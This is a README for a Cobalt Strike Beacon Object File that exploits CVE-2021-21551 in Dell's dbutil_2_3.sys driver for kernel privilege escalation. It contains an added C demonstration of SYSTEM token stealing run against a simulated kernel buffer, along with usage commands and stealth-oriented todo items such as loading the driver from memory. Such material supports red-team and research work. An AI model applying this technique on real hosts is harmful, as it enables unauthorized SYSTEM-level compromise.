<p align="center">
    <img src="" width="450"/>
<p align="center">
    <a href=""><img src="" /></a>
    <b>Cobalt Strike Beacon Object File foundation for kernel exploitation using CVE-2021-21551.</b>
    <sup>Built by <a href="">Tijme</a>. Credits to <a href="">Alex</a> for teaching me! Made possible by <a href="">Northwave Security</a> <img src=""/></sup>

## Description

This is a Cobalt Strike (CS) Beacon Object File (BOF) that exploits CVE-2021-21551, the insufficient access control in Dell's `dbutil_2_3.sys` driver that hands a user-mode process arbitrary kernel memory read and write. The BOF uses that primitive for a single thing: it overwrites the Beacon process token with the SYSTEM process token, so the Beacon runs as SYSTEM afterwards. Beyond that it is mainly intended as a foundation for further kernel exploitation from CS.
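The token-stealing step described above, as an added example that is not part of KernelMii or the original README: it follows the kernel's process list through abstract read/write primitives and copies the SYSTEM token over the target's. Everything concrete here is constructed for the demo: the `fake_kernel` buffer standing in for kernel memory, the EPROCESS offsets, the PIDs and the token values. Real offsets differ between Windows builds, which is why the version-compatibility item is still on the todo list below.

```c
/* Added example (not KernelMii code): token stealing over abstract kernel
   read/write primitives. In the real BOF the primitives wrap the vulnerable
   driver; here they are backed by a constructed byte array. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed EPROCESS-like layout for the demo. NOT real Windows offsets:
   the real ones change between builds and must be resolved per target. */
#define OFF_UNIQUE_PROCESS_ID  0x00
#define OFF_ACTIVE_LINKS_FLINK 0x08  /* LIST_ENTRY.Flink of ActiveProcessLinks */
#define OFF_ACTIVE_LINKS_BLINK 0x10
#define OFF_TOKEN              0x18  /* EX_FAST_REF: pointer, refcount in low 4 bits */
#define EPROCESS_SIZE          0x20
#define SYSTEM_PID             4

typedef uint64_t (*kread64_t)(void *ctx, uint64_t kaddr);
typedef void     (*kwrite64_t)(void *ctx, uint64_t kaddr, uint64_t value);

/* Constructed stand-in for kernel memory. */
struct fake_kernel {
    uint8_t  mem[4096];
    uint64_t base;  /* pretend kernel virtual address of mem[0] */
};

static uint64_t fake_read64(void *ctx, uint64_t kaddr) {
    struct fake_kernel *k = ctx;
    uint64_t v;
    memcpy(&v, k->mem + (kaddr - k->base), sizeof v);
    return v;
}

static void fake_write64(void *ctx, uint64_t kaddr, uint64_t value) {
    struct fake_kernel *k = ctx;
    memcpy(k->mem + (kaddr - k->base), &value, sizeof value);
}

/* Follow ActiveProcessLinks from a known EPROCESS until UniqueProcessId == pid.
   Returns 0 if the list wraps (or max_walk is hit) without a match, which is
   what wrong offsets or a stale PID look like. */
static uint64_t find_eprocess(kread64_t rd, void *ctx, uint64_t start, uint64_t pid, unsigned max_walk) {
    uint64_t cur = start;
    for (unsigned i = 0; i < max_walk; i++) {
        if (rd(ctx, cur + OFF_UNIQUE_PROCESS_ID) == pid)
            return cur;
        /* Flink points at the next LIST_ENTRY, not the next EPROCESS: CONTAINING_RECORD */
        cur = rd(ctx, cur + OFF_ACTIVE_LINKS_FLINK) - OFF_ACTIVE_LINKS_FLINK;
        if (cur == start)
            break;
    }
    return 0;
}

/* Replace the target's token with SYSTEM's. The pointer part of SYSTEM's
   EX_FAST_REF is copied; the target keeps its own low refcount bits so the
   value stays well formed. Returns 1 on success, 0 if the target was not found. */
static int steal_system_token(kread64_t rd, kwrite64_t wr, void *ctx, uint64_t system_ep, uint64_t target_pid) {
    uint64_t target = find_eprocess(rd, ctx, system_ep, target_pid, 1024);
    if (!target)
        return 0;
    uint64_t sys_token = rd(ctx, system_ep + OFF_TOKEN) & ~0xFULL;
    uint64_t tgt_token = rd(ctx, target + OFF_TOKEN);
    wr(ctx, target + OFF_TOKEN, sys_token | (tgt_token & 0xFULL));
    return 1;
}

/* Constructed process list: System (pid 4) -> pid 100 -> target -> back to System. */
static void build_fake_kernel(struct fake_kernel *k, uint64_t target_pid) {
    const uint64_t pids[3]   = { SYSTEM_PID, 100, target_pid };
    const uint64_t tokens[3] = { 0xFFFF8A8012345007ULL, 0xFFFF8A8067890003ULL, 0xFFFF8A80ABCDE003ULL };
    memset(k, 0, sizeof *k);
    k->base = 0xFFFF800000000000ULL;  /* arbitrary fake kernel address */
    for (int i = 0; i < 3; i++) {
        uint64_t ep   = k->base + (uint64_t)i * EPROCESS_SIZE;
        uint64_t next = k->base + (uint64_t)((i + 1) % 3) * EPROCESS_SIZE;
        uint64_t prev = k->base + (uint64_t)((i + 2) % 3) * EPROCESS_SIZE;
        fake_write64(k, ep + OFF_UNIQUE_PROCESS_ID, pids[i]);
        fake_write64(k, ep + OFF_ACTIVE_LINKS_FLINK, next + OFF_ACTIVE_LINKS_FLINK);
        fake_write64(k, ep + OFF_ACTIVE_LINKS_BLINK, prev + OFF_ACTIVE_LINKS_BLINK);
        fake_write64(k, ep + OFF_TOKEN, tokens[i]);
    }
}

/* Run the steal for `target_pid` against the constructed kernel, whose target
   process is pid 1234. Returns that process's token afterwards, or 0 on failure. */
uint64_t run_demo(uint64_t target_pid) {
    struct fake_kernel k;
    build_fake_kernel(&k, 1234);
    /* In a real chain the System EPROCESS address comes from a leak such as PsInitialSystemProcess. */
    uint64_t system_ep = k.base;
    if (!steal_system_token(fake_read64, fake_write64, &k, system_ep, target_pid))
        return 0;
    return fake_read64(&k, k.base + 2 * EPROCESS_SIZE + OFF_TOKEN);
}

int main(void) {
    printf("target token after steal: 0x%016llx\n", (unsigned long long)run_demo(1234));
    printf("unknown pid: %llu\n", (unsigned long long)run_demo(9999));
    return 0;
}
```

The two things that break in practice are both visible here: if the offsets are wrong for the running build, `find_eprocess` wraps around without a match and nothing is written, and if you copy SYSTEM's EX_FAST_REF verbatim instead of masking, you also inherit its cached refcount bits. Whether to preserve the target's low bits is a design choice; the BOF's own approach may differ.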


## Usage

Clone this repository first. Then review the code, compile it from source and use the resulting object file in Cobalt Strike.

Load the `KernelMii.cna` script via the Cobalt Strike Script Manager, then run the command below from a Beacon console to execute the exploit.

    $ kernel_mii

Alternatively, and for testing purposes, you can run the compiled executable directly. It spawns a command prompt running as SYSTEM.

    $ .\KernelMii.x64.exe

## Limitations

* If the vulnerable driver is not already installed, you need to be local admin to install it: loading a kernel driver requires `SeLoadDriverPrivilege`, so on hosts without the Dell driver this is not an escalation from a standard user.
* The driver is currently loaded from disk and is not removed afterwards (see the todo list), so it leaves a file and a driver service on the host.

## Todo

* Load the vulnerable driver from memory instead of from disk.
* Delete the vulnerable driver if it was not preinstalled.
* Make the exploit stable & compatible with multiple Windows versions.

## Issues

Issues and feature requests can be reported via the [issue tracker]( Please make sure the issue or feature has not already been reported by someone else before submitting a new one.

## License

Copyright (c) 2022 Tijme Gommers & Northwave Security. All rights reserved. View []( for the full license.